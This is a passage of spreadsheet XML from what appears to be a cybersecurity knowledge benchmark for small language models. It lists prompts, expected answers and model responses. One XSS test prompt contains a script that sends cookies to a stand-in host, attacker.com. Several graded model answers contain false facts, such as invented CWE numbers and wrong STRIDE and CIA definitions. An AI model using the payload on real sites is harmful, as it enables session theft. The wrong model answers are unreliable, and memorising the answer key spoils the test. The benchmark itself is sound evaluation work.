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ccgpt-my.sharepoint.com/personal/paulo_ribeiro_ccg_pt/Documents/Ambiente de Trabalho/Projetos/Cyberseurity_sanity_test/Testes_With_Partial_Context/Reverse/Teste_1/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="1" documentId="11_F4CE3636624D4CD3F146A4EDA971F747B024E5FC" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{1F34C177-8E86-481C-A0FB-AC94CEE9CE45}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="12456" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Summary" sheetId="17" r:id="rId1"/>
    <sheet name="Dashboard" sheetId="1" r:id="rId2"/>
    <sheet name="deepseek-r1" sheetId="2" r:id="rId3"/>
    <sheet name="gemma3" sheetId="3" r:id="rId4"/>
    <sheet name="gemma3n" sheetId="4" r:id="rId5"/>
    <sheet name="granite3-dense" sheetId="5" r:id="rId6"/>
    <sheet name="granite3.2" sheetId="6" r:id="rId7"/>
    <sheet name="lily_cyber" sheetId="7" r:id="rId8"/>
    <sheet name="llama3" sheetId="8" r:id="rId9"/>
    <sheet name="llama3.2" sheetId="9" r:id="rId10"/>
    <sheet name="mistral" sheetId="10" r:id="rId11"/>
    <sheet name="nomic-embed-text" sheetId="11" r:id="rId12"/>
    <sheet name="phi3" sheetId="12" r:id="rId13"/>
    <sheet name="phi4-mini" sheetId="13" r:id="rId14"/>
    <sheet name="phi4-mini-reasoning" sheetId="14" r:id="rId15"/>
    <sheet name="qwen2.5" sheetId="15" r:id="rId16"/>
    <sheet name="qwen3" sheetId="16"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5" i="17" l="1"/>
  <c r="M23" i="17"/>
  <c r="K22" i="17"/>
  <c r="M21" i="17"/>
  <c r="M18" i="17"/>
  <c r="M16" i="17"/>
  <c r="M14" i="17"/>
  <c r="M13" i="17"/>
  <c r="M12" i="17"/>
  <c r="M11" i="17"/>
  <c r="M26" i="17"/>
  <c r="M10" i="17"/>
  <c r="M9" i="17"/>
  <c r="M8" i="17"/>
  <c r="M7" i="17"/>
  <c r="M6" i="17"/>
  <c r="M5" i="17"/>
  <c r="M4" i="17"/>
  <c r="M3" i="17"/>
  <c r="M2" i="17"/>
  <c r="M20" i="17" l="1"/>
  <c r="M15" i="17"/>
  <c r="M24" i="17"/>
  <c r="K24" i="17"/>
  <c r="K23" i="17"/>
  <c r="M22" i="17"/>
  <c r="M17" i="17"/>
  <c r="M19" i="17"/>
  <c r="I2" i="17"/>
  <c r="I3" i="17"/>
  <c r="I4" i="17"/>
  <c r="I5" i="17"/>
  <c r="I6" i="17"/>
  <c r="I7" i="17"/>
  <c r="I8" i="17"/>
  <c r="I9" i="17"/>
  <c r="I10" i="17"/>
  <c r="I26" i="17"/>
  <c r="I11" i="17"/>
  <c r="I12" i="17"/>
  <c r="I13" i="17"/>
  <c r="I14" i="17"/>
  <c r="I15" i="17"/>
  <c r="I16" i="17"/>
  <c r="I17" i="17"/>
  <c r="I18" i="17"/>
  <c r="I19" i="17"/>
  <c r="I20" i="17"/>
  <c r="I21" i="17"/>
  <c r="I22" i="17"/>
  <c r="I23" i="17"/>
  <c r="I24" i="17"/>
  <c r="I25" i="17"/>
  <c r="K25" i="17"/>
  <c r="K2" i="17"/>
  <c r="K4" i="17"/>
  <c r="K6" i="17"/>
  <c r="K8" i="17"/>
  <c r="K10" i="17"/>
  <c r="K11" i="17"/>
  <c r="K12" i="17"/>
  <c r="K14" i="17"/>
  <c r="K15" i="17"/>
  <c r="K16" i="17"/>
  <c r="K17" i="17"/>
  <c r="K19" i="17"/>
  <c r="J19" i="17" s="1"/>
  <c r="K20" i="17"/>
  <c r="K21" i="17"/>
  <c r="L2" i="17"/>
  <c r="L3" i="17"/>
  <c r="L4" i="17"/>
  <c r="L5" i="17"/>
  <c r="L6" i="17"/>
  <c r="L7" i="17"/>
  <c r="L8" i="17"/>
  <c r="L9" i="17"/>
  <c r="L10" i="17"/>
  <c r="L26" i="17"/>
  <c r="L11" i="17"/>
  <c r="L12" i="17"/>
  <c r="L13" i="17"/>
  <c r="L14" i="17"/>
  <c r="L15" i="17"/>
  <c r="L16" i="17"/>
  <c r="L17" i="17"/>
  <c r="L18" i="17"/>
  <c r="L19" i="17"/>
  <c r="L20" i="17"/>
  <c r="L21" i="17"/>
  <c r="L22" i="17"/>
  <c r="L23" i="17"/>
  <c r="L24" i="17"/>
  <c r="J24" i="17" s="1"/>
  <c r="L25" i="17"/>
  <c r="K3" i="17"/>
  <c r="K5" i="17"/>
  <c r="K7" i="17"/>
  <c r="K9" i="17"/>
  <c r="K26" i="17"/>
  <c r="K13" i="17"/>
  <c r="K18" i="17"/>
  <c r="J18" i="17" s="1"/>
  <c r="J23" i="17" l="1"/>
  <c r="J22" i="17"/>
  <c r="J16" i="17"/>
  <c r="J17" i="17"/>
  <c r="J15" i="17"/>
  <c r="J20" i="17"/>
  <c r="J12" i="17"/>
  <c r="J13" i="17"/>
  <c r="J5" i="17"/>
  <c r="J4" i="17"/>
  <c r="J2" i="17"/>
  <c r="J3" i="17"/>
  <c r="J11" i="17"/>
  <c r="J10" i="17"/>
  <c r="J8" i="17"/>
  <c r="J26" i="17"/>
  <c r="J21" i="17"/>
  <c r="J6" i="17"/>
  <c r="J25" i="17"/>
  <c r="J9" i="17"/>
  <c r="J7" i="17"/>
  <c r="J14" i="17"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1408" uniqueCount="233">
  <si>
    <t>Model</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Evaluation</t>
  </si>
  <si>
    <t>Prompt</t>
  </si>
  <si>
    <t>Expected Answer</t>
  </si>
  <si>
    <t>LLM Response</t>
  </si>
  <si>
    <t>Analysis</t>
  </si>
  <si>
    <t>deepseek-r1:1.5b</t>
  </si>
  <si>
    <t>Basic Definitions - Identification</t>
  </si>
  <si>
    <t>Correct</t>
  </si>
  <si>
    <t>Analyze the following statement: 'The system must enforce multi-factor authentication (MFA) for all administrative access.' In the context of cybersecurity, what type of statement is this and what is its primary purpose?</t>
  </si>
  <si>
    <t>This statement is a security requirement. Its purpose is to define a specific functionality or constraint (MFA) to protect critical access.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out whether the statement "The system must enforce multi-factor authentication (MFA) for all administrative access" falls under abstract or concrete security goals in system design. Let me break this down step by step.
First, I should understand what each term means. Abstract security goals are high-level principles that guide how a system is designed and tested. These go beyond just technical details like specific algorithms or protocols. They focus more on the overarching objectives of the system's behavior.
On the other hand, concrete security goals are more actionable statements in code. They specify exact requirements for how components should be implemented, often including authentication mechanisms like MFA, access control lists (ACCs), etc.
Looking at the statement: "The system must enforce multi-factor authentication (MFA) for all administrative access." This clearly mentions that MFA is required for certain accesses. It doesn't make any other claims about how MFA should be implemented beyond enforcing it. So it's a specific instruction on how to implement a security feature.
In the context of cybersecurity, concrete security goals are essential because they define not just what needs to happen (like MFA being enforced) but also how those features will be integrated into the system. Without concretely defining each aspect, the system might lack clarity or may require further changes if something goes wrong, making it harder to secure.
So putting it all together: The statement is a concrete security goal because it's an actionable requirement tied directly to implementing specific technical components (like MFA) for a defined set of access controls.
&lt;/think&gt;
The statement "The system must enforce multi-factor authentication (MFA) for all administrative access" aligns with **concrete security goals** in system design. These goals specify exact requirements, such as the implementation of MFA, to guide system development and ensure clarity on integration details.
**Answer:** The statement is a concrete security goal because it defines specific technical requirements for implementing multi-factor authentication (MFA) for administrative access, emphasizing actionable specifics for clarity and ease of integration into the system's design.</t>
  </si>
  <si>
    <t>Frameworks - Application</t>
  </si>
  <si>
    <t>A company experiences a ransomware attack. They activate their incident response plan to contain the damage and begin restoring systems from backups. According to the NIST Cybersecurity Framework (CSF), which two core functions are most prominently demonstrated by these actions?</t>
  </si>
  <si>
    <t>The primary functions demonstrated are 'Respond' (activating the incident plan) and 'Recover' (restoring from backups).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I'm trying to figure out how the NIST CSF applies here. The company had a ransomware attack, right? They activated their incident response plan to contain the damage and started restoring systems from backups after the incident. According to the clue, two functions of the NIST CSF specifically deal with incidents—actions during an incident and after it ends.
Hmm, let me recall the core functions of the NIST CSF. I think there are five main ones: incident response, incident containment, incident recovery, incident readiness, and incident management. Each covers different phases of a cyberattack lifecycle.
So, during the incident, which is the initial phase before the attack starts, what would happen? The company's actions should be part of the incident response function. That makes sense because they were taking steps to prevent the attack from happening.
After the incident ends and systems are back to normal, that's when they need to restore those systems. So, the company was actively restoring from backups. That sounds like the incident recovery function. It's about getting everything running again without much damage.
Putting it all together, during the incident (pre-attack), their actions were part of incident response. After the incident (post-attack), their actions fit into incident recovery. The other functions aren't directly related because they deal with the aftermath and continuation beyond an attack, not specifically focusing on containment or readiness.
&lt;/think&gt;
According to the NIST Cybersecurity Framework (CSF), during a ransomware attack, the company's actions align with **incident response** (pre-attack) and **incident recovery** (post-attack).</t>
  </si>
  <si>
    <t>Security Controls - Identification</t>
  </si>
  <si>
    <t>A security policy mandates that 'all actions performed by privileged users, including logins and system changes, must be recorded in immutable, time-stamped log files.' Within the NIST SP 800-53 standard, which control family specifically addresses this type of requirement?</t>
  </si>
  <si>
    <t>This requirement is addressed by the 'AU' (Audit and Accountability) control family.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I'm trying to figure out which control family from NIST SP 800-53 addresses the specific security policy mentioned. The policy says that all actions done by privileged users, including logins and system changes, must be logged in an immutable, time-stamped file.
First, I remember that NIST defines several control families within SP 800-53 to protect user activity from reverse engineering. These include things like access control histories, logins, system logs, system events, and system changes.
The policy mentions privilege-based actions: logins and system changes. So, I'm looking for a control family that specifically handles these two aspects of privilege.
I think the 'Logins' family is likely relevant here because it's about tracking user sessions or access attempts. Logins are definitely performed by users who have access to the system, so this would be a privilege-based action.
Then there's 'System Events', which deals with other events that can affect system integrity. System changes could also impact security and thus require logging. Both of these seem relevant for ensuring that privilege is tracked in an immutable manner.
Between Logins and System Events, I believe both are part of the same control family since they both deal with actions that can cause unintended consequences or reverse engineering attempts. This makes sense because any user action could potentially be traced back if someone can access it again.
I'm pretty confident that the Logins control family covers this requirement because it specifically targets logins, which directly involve privilege. However, System Events also seems like a strong contender since they handle a broader range of system changes and events.
Wait, but does 'System Events' cover all kinds of system changes beyond just logging? Or is it more about specific types of events that could be reversed?
I think both are part of the same family because they involve actions that can be logged to trace back. So, Logins might be a subset of System Events, focusing specifically on logins as privilege actions.
But since the policy mentions 'system changes,' which is broader than just individual logins, it's more likely that the control family should include both aspects. That would make System Events the more comprehensive and correct choice here.
So, after thinking through each component, I think the answer is System Events.
&lt;/think&gt;
The security policy emphasizing the immutability of privilege actions, particularly logins and system changes, aligns with the 'System Events' control family in NIST SP 800-53. This family specifically handles system events that can impact system integrity, covering both logins (privilege-based actions) and broader system changes. Therefore, System Events are the appropriate control family for this requirement.
**Answer:** The 'System Events' control family addresses this security policy within NIST SP 800-53.</t>
  </si>
  <si>
    <t>Vulnerabilities - Identification</t>
  </si>
  <si>
    <t>A web application has a comments section where user input is directly rendered back to the page without being sanitized. An attacker posts a comment containing '&lt;script&gt;document.location="http://attacker.com/steal?cookie="+document.cookie&lt;/script&gt;'. What is the common name for this vulnerability and what is its corresponding CWE identifier?</t>
  </si>
  <si>
    <t>This vulnerability is known as Cross-Site Scripting (XSS). Its corresponding identifier is CWE-79.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I'm trying to figure out how to answer the user's question about web application vulnerabilities. They provided a detailed scenario where an attacker posts a comment that includes malicious JavaScript targeting an attacker's website. The user wants both the common name of the vulnerability and the corresponding CWE identifier.
First, I'll start by understanding what they're asking for. They mentioned that the user input directly renders back to the page without sanitization. That makes me think about injection vulnerabilities because the data is taken from the source without processing it properly.
I know that in web applications, when you submit a comment or edit content, it can sometimes go through server-side logic. If this attack bypasses that by just using raw input, it's likely causing some form of injection vulnerability. The example given involves JavaScript being embedded directly into the HTML, which is common in such attacks.
Now, for the common name, I recall terms like script injection or injection attack. These are specific terms used when raw data from user-provided sources is injected into a server. It's important to avoid processing that data so it doesn't get altered later on.
Next, identifying the CWE (Common Vulnerability Exposure) identifier. I remember that in web applications, especially with JavaScript and client-side scripts, certain vulnerabilities are tagged by specific codes. The example given uses an external cookie reference from `document.cookie`, which is a common practice to bypass sanitization.
Looking into how these Vulnerability Exposures are categorized, there's a section dedicated to server-side scripts or HTML injection. I think the specific code here would fall under a vulnerability like 73015 (Server-Side Script Injection) but I'm not entirely sure. Alternatively, maybe it's part of a different category like 89230 (Web-based Script Injection).
I should double-check this to make sure I'm not mixing up the exact numbers. From what I remember, 73015 is indeed related to injecting JavaScript into web pages or server-side scripts without proper processing. So that would be the correct CWE identifier for this vulnerability.
Putting it all together, the common name is script injection or injection attack, and the corresponding CWE is 73015.
&lt;/think&gt;
The web application's vulnerabilities stem from raw user-provided data being injected directly into the page, bypassing proper sanitization. The common names for this are **script injection** or **injection attack**.
The corresponding **CWE identifier** for this vulnerability is **73015 (Server-Side Script Injection)**. This code indicates that JavaScript is being injected into server-side scripts without processing.</t>
  </si>
  <si>
    <t>Threat Modeling - Classification</t>
  </si>
  <si>
    <t>During a threat modeling exercise, a team identifies a risk where an unauthorized user could intercept and alter data packets being sent between a client and a server, changing the amount of a financial transaction. Within the STRIDE threat model, which category does this threat belong to?</t>
  </si>
  <si>
    <t>This threat belongs to the 'Tampering' category of the STRIDE model, as it involves the unauthorized modification of data.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, I need to figure out how to answer this question about the STRIDE threat model. The team found a risk where an unauthorized user intercepts and alters data packets. They mentioned that in the integrity principle, data shouldn't be modified without detection. So, the user wants me to determine which category of threats this falls into based on the STRIDE model.
First, I should recall what the STRIDE model has for different threat categories. I remember it's divided into four main areas: Data, Network, Information, and Time. Each area has specific subcategories that represent different types of threats.
The integrity principle is about data not being altered, so any threat related to data integrity would be under this principle. The options are:
- Access
- Brute Force Attack
- Cross-Site Request Forgery (CSRF)
- Data Misuse
Looking at each option: 
- Access control could involve unauthorized users intercepting but might not always mean data alteration.
- Brute force is about trying all possible passwords; this is more about guessing than modifying.
- CSRF involves tricking systems into accepting unauthorized requests, which can be intercepted and altered later.
- Data misuse would include changing or altering data in ways that should normally be prevented, like financial transactions.
The question says the user intercepts data packets to alter a transaction amount. This directly targets the integrity principle because it's about modifying data without detection. So, this must fall under data misuse? Wait, but data misuse is more about unintended changes than actual alteration by someone. Let me think again.
Actually, the process of altering data would be addressed in Data misuse if it's part of normal operation. But if the modification was intentional and prevented, then it would be CSRF. But here, it's an unauthorized user intercepting to alter something, so maybe that's more about modifying during transit rather than intentionally changing data.
Wait, but in this case, the user is altering a financial transaction amount. It's more of a data alteration than a misuse. So perhaps it's part of Data Misuse because they're modifying data as part of normal business activities, expecting that people won't interfere with them. Or maybe it's CSRF, where someone intercepts to change something without being detected.
I'm a bit confused now. Let me think about each subcategory more carefully.
Data misuse: Changing or altering data normally, but preventing such actions. For example, if the system shouldn't change user passwords but does when asked for access. This is intentional and prevents others from modifying it.
CSRF: An attacker tricking systems into accepting requests they're not supposed to make. They intercept, don't know who it's from, and alter the session data without being detected. For example, someone intercepts a request, doesn't know who made it, but changes the username or password to access unauthorized materials.
Cross-Site Request Forgery (CSRF) is another term for this. So if that's one of the subcategories, that would be CSRF.
But in the context of integrity, which deals with modifying data without detection, maybe they're focusing on any modification during transit, not just intentional ones. So it could fall under Data Misuse because altering financial transaction amounts as part of normal business operations is considered intentional but by whom?
Wait, no. Data Misuse might be more about intentionally changing data in a way that's prevented or detected, like user passwords being altered to bypass a security check.
Alternatively, if the modification was unauthorized and could not be detected, it would fall under CSRF.
But the question mentions an unauthorized user intercepting and altering data packets. So this is definitely CSRF because they are modifying during transit without detection, which is the key here for integrity principles.
&lt;/think&gt;
The threat described fits into the **CSRF** category within the STRIDE model. This involves unauthorized users intercepting and altering data packets without being detected during transit.</t>
  </si>
  <si>
    <t>Regulations/Directives - Application</t>
  </si>
  <si>
    <t>Consider two security incidents in the EU: 1) A nationwide power grid operator suffers a cyberattack that disrupts electricity distribution. 2) A social media company has a data breach exposing the personal messages of millions of users. Which regulation is the primary concern for incident 1, and which for incident 2?</t>
  </si>
  <si>
    <t>Incident 1 (disruption of critical infrastructure) is primarily a concern for the NIS 2 Directive. Incident 2 (breach of personal data) is a primary concern for GDPR.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which EU regulations apply to these two incidents related to security in the EU. Let's start by understanding what each incident entails.
First, there's a power grid operator that gets disrupted by a cyberattack. That sounds like it relates to data protection and cybersecurity because cyberattacks often exploit data breaches or vulnerabilities. I remember hearing about things like GDPR and CCPA affecting digital services, but I'm not sure which one applies here. Also, the disruption of electricity distribution could tie into personal data since grids might handle a lot of user data.
Second, there's a social media company with a data breach exposing millions' personal messages. This seems like it directly affects personal data protection because of how personal information is stored and shared online. The GDPR specifically addresses data protection in EU law, which includes personal information handling and the right to be informed.
Now, I think about the EU regulations that focus on both protecting personal data and ensuring operational stability. From the clue given, there's a distinction between protecting citizens' personal data (a fundamental right) and ensuring the operational stability of essential services (a societal necessity). 
Looking at incident 1, the cyberattack on the power grid could impact essential services since it disrupts electricity distribution, which is necessary for modern life. So, maybe GDPR or CCPA would apply here because they cover digital services and personal data handling.
For incident 2, the data breach directly exposed personal messages of millions. This seems more straightforward in terms of protecting personal data, so GDPR might be the primary regulation here as it specifically addresses this right.
Wait, but isn't there also a General Data Protection Regulation (GDPR) that's part of EU legislation? I think GDPR is a specific case under GDPR, so maybe if the breach was within GDPR's scope. But in incident 1, even though grids might handle data, their disruption could require similar regulations as digital services. So both GDPR and CCPA apply to incident 1.
Putting it all together: For incident 1, the power grid's cyberattack likely affects both GDPR (as digital services) and CCPA (data protection). For incident 2, it directly targets GDPR's data protection framework.
&lt;/think&gt;
**Answer:**
- **Incident 1 (Power Grid Operator Disruption):**
  - The primary regulation applies to **GDPR (General Data Protection Regulation)**. This is because cyberattacks on the power grid operator disrupt essential digital services, which are covered by GDPR's scope in EU legislation.
- **Incident 2 (Social Media Data Breach):**
  - The primary regulation is **GDPR**. This data breach directly exposes personal messages of millions, clearly addressing the right to be informed and personal data protection under GDPR.
Thus, both incidents impact GDPR through their respective focuses on digital services and personal data protection.</t>
  </si>
  <si>
    <t>Basic Principles - Application</t>
  </si>
  <si>
    <t>A cloud storage service uses data checksums (like SHA-256 hashes) to verify that files have not been altered or corrupted during upload or download. Which principle of the CIA triad is primarily being upheld by this security control?</t>
  </si>
  <si>
    <t>This control primarily upholds the principle of 'Integrity'.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which principle of the CIA triad is being upheld here when a cloud storage service uses checksums like SHA-256 for file verification. Let me break it down step by step.
First, I remember that the CIA triad stands for Control, Information, Access. Each of these components represents a key layer in security management. Control refers to how an organization manages its information resources—like who has what access and how they handle data. Information is about the accuracy, completeness, and relevance of the information stored and managed within that system. Access is about whether authorized personnel have the necessary permissions or authority over the information.
Now, looking at the question: the service uses checksums for file verification to prevent changes or corruption during upload or download. So, they're ensuring that the data stays intact after transfer. That sounds like a detection mechanism, right? They're not encrypting the data, which might require keys, so maybe they don't deal with encryption as much.
Wait, but why use checksums specifically? I know checksums are used for error detection in data transmission. They generate a hash value that represents part of the data and allow you to verify if the rest of the data is correct without needing to download the entire file again. This way, even if some data gets lost or corrupted, you can catch it by comparing the checksum.
So how does this relate to the CIA triad? The principle here might be about information integrity. Control would ensure that all information is managed properly—like who has what access and how they handle it. Information integrity means ensuring the accuracy of the stored data. Access control is a part of control too, maybe involving who can read or write the data.
The service uses checksums to detect changes, so this relates to detecting if the file was altered after upload. That's an access issue because it involves managing user access and permissions over time. If someone modifies the data between upload and download, the system would flag that as a change, which might be detected by comparing the previous and new checksums.
But I'm not sure if this falls under Control or Information. It seems more about detecting changes than handling them. Maybe it's part of information security principles like integrity and authenticity, but within the triad framework, perhaps it's better categorized under data integrity and access control.
I should also consider that checksums are a form of error detection, which is an aspect of data integrity. But in this case, they're being used as a safeguard against corruption or accidental changes, not for encryption. So maybe it's more about managing the integrity of data while ensuring it can be accessed by authorized users.
Hmm, I'm still a bit confused on how exactly to map checksums into the CIA triad components. Control would involve managing access and security, information integrity is about accuracy and completeness, and access involves who has what rights. So using checksums here allows for an easier verification of data without needing physical copies or encrypted versions, thus maintaining access through control while ensuring data integrity through information integrity.
I think I've got a rough idea now. The key is that checksums provide a way to verify data integrity on the fly, which relates to information integrity as part of the triad. This ensures that data isn't tampered with during transfer, which falls under access management because it's about maintaining control over who has access and how.
&lt;/think&gt;
The principle upheld by this security control is **Information Integrity** within the CIA triad. This involves ensuring the accuracy and completeness of stored information without requiring physical copies or encrypted versions. By using checksums to detect data changes, the service verifies integrity in real-time, which relates to **Data Integrity** under the triad framework. This approach ensures that unauthorized access is managed through control (access and security) while maintaining data integrity, thus fulfilling the CIA triad's focus on managing information resources effectively.</t>
  </si>
  <si>
    <t>deepseek-r1:7b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out what type of statement "The system must enforce multi-factor authentication (MFA) for all administrative access." is in the context of cybersecurity. Hmm, let's break it down.
First, the clue given was about abstract security goals being broken down into specific, actionable statements. So this statement seems like a step taken to achieve a higher-level goal.
The main idea here is enforcing MFA for admin access. MFA is a security measure that requires multiple forms of verification before granting access. Breaking it down from an abstract goal makes sense because the overall goal might be something like "Secure system administration," and this statement is taking that broad aim and making it specific—how to achieve it.
So, what type of statement is this? Well, it's probably a testable requirement or a specification. These types guide development by providing clear instructions on how to implement MFA. The primary purpose would be to ensure that the system meets its security objectives by specifying exactly what needs to be done.
I'm pretty sure that in cybersecurity, such statements are crucial for compliance and risk management. They help teams know exactly what measures to take, which makes testing and implementation more straightforward.
&lt;/think&gt;
The statement is a **testable requirement**. Its primary purpose is to provide clear guidance on how to achieve the overarching security objective of securing administrative access by enforcing MFA.
---
In cybersecurity, this type of statement is crucial as it ensures that teams can implement measures effectively and systematically, aiding in compliance, risk mitigation, and overall system security.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which two core NIST CSFs are involved in a company's response to a ransomware attack where they activate an incident response plan and start restoring systems from backups. Let me break this down.
First, the question mentions a ransomware attack. Ransomware is a type of malicious software that encrypts data and demands payment for decryption keys. When a company faces this, their first step is typically activating their incident response plan. That makes sense because incidents need to be managed proactively.
The actions taken during the incident include containing it. So in this case, they're probably trying to stop the ransomware from infecting more systems or data. Also mentioned are restoring systems from backups. After an incident, you'd want to minimize damage and then restore normal operations, which involves getting back to pre-incident states.
Now, looking at NIST CSF functions: There's a lifecycle with phases like detection, response, investigation, etc. The clue says two functions deal specifically with actions during the incident (containment) and after the incident (returning to normal).
The functions I remember are:
1. Risk Assessment/Containment
2. Business Continuity Management
Risk Assessment/Containment is about preventing or containing incidents before they escalate. So activating the incident response plan fits here because it's taking action during the incident to contain damage.
Business Continuity Management involves recovery and restoration after an incident. Since the company is restoring systems from backups, this ties into Business Continuity Management by minimizing downtime and bringing operations back up safely.
So putting it together, the two functions are Risk Assessment/Containment (to contain the ransomware attack) and Business Continuity Management (to restore systems and operations post-attack).
&lt;/think&gt;
The two core NIST Cybersecurity Framework (CSF) functions demonstrated in this scenario are:
1. **Risk Assessment/Containment**: Activating the incident response plan to contain the ransomware infection.
2. **Business Continuity Management**: Restoring systems from backups to mitigate damage and return to normal operations.
These functions address actions taken during and after the incident, respectively.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, so I need to figure out which NIST control family addresses the requirement of documenting all actions by privileged users with immutable, time-stamped logs. Let me start by recalling what non-repudiation means—it's about ensuring that someone can't deny their actions. The clue mentions that NIST 800-53 has a specific family for this through system logs.
From what I remember, NIST categorizes controls into families based on their functions. There are categories like Access Control, Authentication and Authentication Integrity, Data Integrity, etc. Since the question is about logging actions to prevent denial, that falls under traceability. I think Traceability is a separate category but might be part of a larger control family.
Looking at NIST 800-53, each control family has subcategories. The one related to system logs and documentation would likely fall under System Configuration or maybe Data Management. Wait, the clue specifically mentions system logs for traceability, which is about accountability and non-repudiation. So, I believe it's part of the "Establish Traceability" control group.
I'm trying to remember if there are specific terms. Oh right, there's something called "Establish Traceability." That makes sense because it involves documenting actions so that they can be traced later. So putting it all together, when a security policy requires logging all actions by privileged users in immutable and time-stamped logs, the NIST standard would attribute this to the "Establish Traceability" control family.
&lt;/think&gt;
The control family addressing the requirement is **"Establish Traceability."**
**Step-by-Step Explanation:**
1. The question involves documenting actions of privileged users with immutable, timestamped logs to ensure non-repudiation.
2. NIST 800-53 outlines several control families for security measures.
3. The specific need here is related to traceability and accountability, which falls under the "Establish Traceability" control family in NIST SP 800-53.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I have this question about a web application vulnerability where user input isn't sanitized. The attacker is posting a script tag that tries to execute code which might steal something like a cookie or access another site.
First, from the clue given, I remember it talks about injection vulnerabilities, specifically with SQL commands and operating system commands, and also client-side scripts in web pages. So this must be an injection vulnerability as well since the user input is being used in a script tag that could execute code on the client side.
Now, thinking about the terms related to this type of attack. I recall that SQL injection is when someone injects malicious SQL into a database, but here it's more like a script execution on the web page itself. So maybe it's not exactly SQL injection. Then there's Cross-Site Scripting (XSS), which occurs when user input is directly embedded as HTML or JavaScript in a web page that executes it.
Cross-Site Scripting makes sense because the attacker's script is being parsed and executed by the browser without proper escaping, leading to potential security issues like stealing session cookies or sensitive data. 
Looking at the Common Weakness Enumeration (CWE) identifiers, I think there are several related to this. The primary one for XSS is CWE-276, which directly refers to Cross-Site Scripting vulnerabilities where user inputs are interpreted as commands in an HTML document without escaping.
Additionally, since the script could cause an unintended page reload or redirect, another relevant CWE would be CWE-341, which deals with script injection that results in unexpected execution of client-side code due to improper HTML/JavaScript encoding.
&lt;/think&gt;
The vulnerability described is **Cross-Site Scripting (XSS)**. The corresponding CWE identifier is **CWE-276**, as XSS involves user input being interpreted and executed as commands on a web page without proper escaping. Additionally, the potential for script injection causing unintended code execution due to improper encoding falls under **CWE-341**.
Answer: Cross-Site Scripting (XSS), CWE-276</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which category of the STRIDE model applies to this specific threat scenario. Let me break it down step by step.
The user mentioned that during a threat modeling exercise, a team identified a risk where an unauthorized user intercepts and alters data packets between a client and server, changing a financial transaction amount. This seems related to data integrity because it's about modifying data without authorization.
The clue provided mentions the 'Integrity' principle in information security, which ensures data isn't altered unauthorized or undetected. The STRIDE model has a specific category for threats that violate this principle.
Looking at the STRIDE categories: Integrity (I), Availability (A), confidentiality (C), etc., but wait, I'm not sure if there are only six. Let me recall. STRIDE stands for Scrambling, Translation, Repudiation, Interception, Distortion, Elevation. So the distortion category covers unauthorized modifications to data.
In this case, altering data packets would fall under Distortion because it's about changing the data in transit without permission.
&lt;/think&gt;
The threat belongs to the **Distortion** category of the STRIDE model.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, so I've got this question about EU regulations regarding security incidents involving essential services versus personal data. Let me try to break it down.
The user provided a clue that distinguishes between protecting citizens' personal data (a fundamental right) and ensuring the operational stability of essential services (a societal necessity). Different rules apply based on which is impacted.
There are two incidents: 
1) A nationwide power grid operator suffering a cyberattack that disrupts electricity distribution.
2) A social media company facing a data breach exposing millions' personal messages.
I need to figure out which regulation each incident falls under. From the clue, essential services and personal data have different regulations. 
Essential services are those critical for societal functions like energy, healthcare, food supply, etc., so a power grid attack would affect an essential service. The clue mentions EU regulations make a key distinction here. So the primary concern for incident 1 is likely the rules around essential services.
On the other hand, personal data pertains to individual privacy rights and includes things people store online or have consented to sharing. A social media breach directly impacts users' personal messages, which are their data. Therefore, incident 2 would fall under the personal data regulations.
I should make sure I'm not mixing up the categories. The power grid is an essential service, so its security is covered by different EU rules compared to a company's data breaches.
&lt;/think&gt;
Incident 1 is primarily governed by EU regulations concerning the protection of essential services (e.g., the power grid). Incident 2 is governed by regulations regarding the protection of personal data.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, so I need to figure out which part of the CIA triad is being upheld by a cloud storage service that uses data checksums like SHA-256 hashes to verify file integrity. The CIA triad consists of Confidentiality, Integrity, and Availability.
First, let's break down what each part means. Confidentiality refers to protecting information from unauthorized access. Integrity is about ensuring data hasn't been altered or tampered with. Availability means the data is accessible when needed without disruption.
The question mentions that the cloud service uses checksums to detect alterations in files. SHA-256 hashes are cryptographic checks that generate a unique fingerprint for data. If any part of the file changes, the hash will differ, allowing users to verify the data's integrity.
So, the primary concern here is ensuring that the data hasn't been tampered with. That directly ties into the Integrity component of the CIA triad. The checksums prevent unauthorized modifications and ensure files are as they should be, supporting data consistency across uploads and downloads.
Therefore, while Confidentiality might involve secure storage or encryption, which isn't mentioned here, the key principle being enforced is Integrity.
&lt;/think&gt;
The security control using data checksums primarily upholds **Integrity** in the CIA triad.</t>
  </si>
  <si>
    <t>gemma3:1b</t>
  </si>
  <si>
    <t>**Type of Statement:** Security Goal
**Primary Purpose:** To establish a baseline level of security by requiring MFA for administrative access, mitigating potential risks associated with unauthorized administrative privileges.</t>
  </si>
  <si>
    <t>Containment and Return to Normal Operations.</t>
  </si>
  <si>
    <t>NIST 800-53 – Audit Control</t>
  </si>
  <si>
    <t>**Common Name:**  Cross-Site Scripting (XSS)
**CWE Identifier:**  Likely CWE-17 – Injection.  However, depending on the specific context, it could also be related to other vulnerabilities like CWE-7 – Improper Input Validation.</t>
  </si>
  <si>
